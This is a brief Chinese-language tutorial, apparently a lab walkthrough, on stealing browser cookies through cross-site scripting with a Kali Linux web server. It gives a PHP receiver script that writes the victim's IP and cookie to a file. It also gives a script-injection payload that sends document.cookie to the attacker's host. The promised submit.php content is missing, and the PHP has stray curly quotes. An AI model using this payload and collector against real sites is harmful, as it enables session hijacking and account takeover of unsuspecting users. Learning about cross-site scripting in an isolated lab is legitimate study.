①先在kali-home-Flie System-var-www-html中找到html文件
②需要在html文件中创建一个新的hack.php文件,创建时,需注意,如是新版的kali,则是没有权限创建的,此刻需要在右键中选择open as root,即转换为root权限,然后再选择创建一个新的文件到html中即可,如下图所示
在该创建的文件html中,输入以下脚本内容
<?php
$victim = ‘XXS get the cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];
file_put_contents(‘1.txt', $victim);
echo welcome;
然后得到如上图所示的情况
③再以相同的方式来创建submit.php文件,并且输入以下内容
④再直接192.168.xx.xxx(你的虚拟机的IP)/submit.php,进入到一个界面,然后再输入语句:
"/> <script>window.open("http://(填入你的IP)/hack.php?cookie="+document.cookie);</script><!-就可以看到所需的界面了